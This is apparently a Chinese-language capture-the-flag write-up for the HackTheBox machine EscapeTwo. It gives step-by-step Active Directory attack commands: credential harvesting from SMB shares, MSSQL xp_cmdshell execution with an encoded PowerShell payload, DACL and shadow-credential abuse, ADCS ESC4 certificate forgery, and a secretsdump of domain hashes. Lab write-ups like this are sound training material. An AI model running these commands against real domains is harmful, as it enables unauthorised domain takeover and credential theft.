EscapeTwo - HackTheBox

基本信息

• https://app.hackthebox.com/machines/EscapeTwo
• 10.10.11.51

As is common in real life Windows pentests, you will start this box with credentials for the following account: rose / KxEPkKe6R8su

端口扫描

没有web，1433以及其他常规域端口：

$ nmap -sC -sV -Pn 10.10.11.51
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-13 13:23 CST
Nmap scan report for 10.10.11.51
Host is up (0.081s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-01-13 05:09:21Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after:  2025-06-08T17:35:00
|_ssl-date: 2025-01-13T05:10:41+00:00; -15m36s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-01-13T04:17:33
|_Not valid after:  2055-01-13T04:17:33
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ssl-date: 2025-01-13T05:10:41+00:00; -15m36s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-13T05:10:41+00:00; -15m37s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after:  2025-06-08T17:35:00
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after:  2025-06-08T17:35:00
|_ssl-date: 2025-01-13T05:10:41+00:00; -15m36s from scanner time.
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2025-01-13T05:10:06
|_  start_date: N/A
|_clock-skew: mean: -15m36s, deviation: 0s, median: -15m36s
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 148.98 seconds

得到的主机名添加hosts：

10.10.11.51 sequel.htb dc01.sequel.htb

bloodhound

使用给出的初始账号密码收集bloodhound信息：

bloodhound-python -u rose -p KxEPkKe6R8su -d sequel.htb -ns 10.10.11.51 -c All --zip

没有从rose直接可以利用的路径：

usernames

可以从bloodhound整理，也可以这样：

faketime -f "-15m36s" nxc smb dc01.sequel.htb -u rose -p KxEPkKe6R8su -d sequel.htb --rid-brute 5000 | grep SidTypeUser | cut -d ':' -f2 | cut -d '\' -f2 | cut -d ' ' -f1 > users.txt

Administrator
Guest
krbtgt
DC01$
michael
ryan
oscar
sql_svc
rose
ca_svc

SMB

smb可以看到一些非默认共享：

python3 examples/smbclient.py rose:'KxEPkKe6R8su'@10.10.11.51

Accounting Department

Accounting Department中有两个xlsx文件，下载下来查看，excel打不开，直接解压查看其中内容,其中一个文件中得到一些账号密码：

unzip accounts.xlsx
cat xl/sharedStrings.xml

angela 0fwz7Q4mSpurIt99
Oscar 86LxLBMgEWaKUnBG
Kevin Md9Wlq1E5bZnVDVo
sa MSSQLP@ssw0rd!

mssql

上面得到的密码中，sa仍然有效，连接mssql，常规xp_cmdshell,得到sql_svc：

python3 examples/mssqlclient.py sa:'MSSQLP@ssw0rd!'@10.10.11.51

enable_xp_cmdshell
xp_cmdshell whoami
xp_cmdshell powershell -e JABjAGwAa<payload>pAA==

但缺所需权限，并不能直接常规pototo到system，继续翻文件，在配置文件中得到密码：

PS C:\SQL2019\ExpressAdv_ENU> type sql-Configuration.INI

WqSZAF6CysDQbGb3

ryan & user flag

枚举可以发现ryan复用了sql_svc密码：

nxc smb 10.10.11.51 -u users.txt -p WqSZAF6CysDQbGb3 -d sequel.htb --continue-on-success

...
SMB         10.10.11.51     445    DC01             [+] sequel.htb\ryan:WqSZAF6CysDQbGb3
...
SMB         10.10.11.51     445    DC01             [+] sequel.htb\sql_svc:WqSZAF6CysDQbGb3
...

ryan在remote management组中，直接winrm登录：

evil-winrm -i 10.10.11.51 -u ryan -p WqSZAF6CysDQbGb3

CA_SVC

ryan对ca_svc有writeowner权限：

那就是ryan把自己设置为ca_svc的owner，修改权限，然后任意操作：

• impacket/examples/dacledit.py at master · fortra/impacket
  https://github.com/fortra/impacket/blob/master/examples/dacledit.py

# 设置owner
bloodyAD --host dc01.sequel.htb -d sequel.htb -u ryan -p WqSZAF6CysDQbGb3 set owner ca_svc ryan
# 修改权限
python3 examples/dacledit.py -action 'write' -rights 'FullControl' -principal 'ryan' -target 'ca_svc' 'sequel.htb'/'ryan':'WqSZAF6CysDQbGb3'
# 常规shadow creds
faketime -f "-15m36s" certipy shadow auto -u ryan@sequel.htb -p 'WqSZAF6CysDQbGb3' -dc-ip 10.10.11.51 -ns 10.10.11.51 -target dc01.sequel.htb -account ca_svc

[*] NT hash for 'ca_svc': 3b181b914e7a9d5508ea1e20bc2b7fce

ADCS

ca_svc是ADCS服务账号，后面就是常规ADCS,发现ESC4:

export KRB5CCNAME=ca_svc.ccache
faketime -f "-15m36s" certipy find -scheme ldap -k -debug -target dc01.sequel.htb -dc-ip 10.10.11.51 -vulnerable -stdout

ESC4

后面就是一步步：

• ly4k/Certipy: Tool for Active Directory Certificate Services enumeration and abuse
  https://github.com/ly4k/Certipy?tab=readme-ov-file#esc4

# 更新模板
faketime -f "-15m36s" certipy template -k -template DunderMifflinAuthentication -target dc01.sequel.htb -dc-ip 10.10.11.51

# 请求证书
faketime -f "-15m36s" certipy req -u ca_svc -hashes 3b181b914e7a9d5508ea1e20bc2b7fce -ca sequel-DC01-CA -target DC01.sequel.htb -dc-ip 10.10.11.51 -template DunderMifflinAuthentication -upn Administrator@sequel.htb -ns 10.10.11.51  -dns 10.10.11.51

# 使用证书认证
faketime -f "-15m36s" certipy auth -pfx ./administrator_10.pfx -dc-ip 10.10.11.51 

7a8d4e04986afa8ed4060f75e5a0b3ff

root flag

使用得到的hash登录：

evil-winrm -i 10.10.11.51 -u Administrator -H 7a8d4e04986afa8ed4060f75e5a0b3ff

hashdump

python3 examples/secretsdump.py Administrator@10.10.11.51 -hashes :7a8d4e04986afa8ed4060f75e5a0b3ff -just-dc-ntlm

Administrator:500:aad3b435b51404eeaad3b435b51404ee:7a8d4e04986afa8ed4060f75e5a0b3ff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1acb6bdf708cb2e0b6802e77649e55cc:::
sequel.htb\michael:1103:aad3b435b51404eeaad3b435b51404ee:cafe5ec3c162eaf0d46e3013b0d71dba:::
sequel.htb\ryan:1114:aad3b435b51404eeaad3b435b51404ee:b9b72edb319dce49b5da313e71491133:::
sequel.htb\oscar:1116:aad3b435b51404eeaad3b435b51404ee:97504ea3a7ca31b7d91e26ef82e3e383:::
sequel.htb\sql_svc:1122:aad3b435b51404eeaad3b435b51404ee:b9b72edb319dce49b5da313e71491133:::
sequel.htb\rose:1601:aad3b435b51404eeaad3b435b51404ee:0e0b8e0b06c681da8c3f1f17e53a4a56:::
sequel.htb\ca_svc:1607:aad3b435b51404eeaad3b435b51404ee:3b181b914e7a9d5508ea1e20bc2b7fce:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:66ad063789d27b459aeaf39372dc628a:::

参考资料

• impacket/examples/dacledit.py at master · fortra/impacket
  https://github.com/fortra/impacket/blob/master/examples/dacledit.py
• ly4k/Certipy: Tool for Active Directory Certificate Services enumeration and abuse
  https://github.com/ly4k/Certipy?tab=readme-ov-file#esc4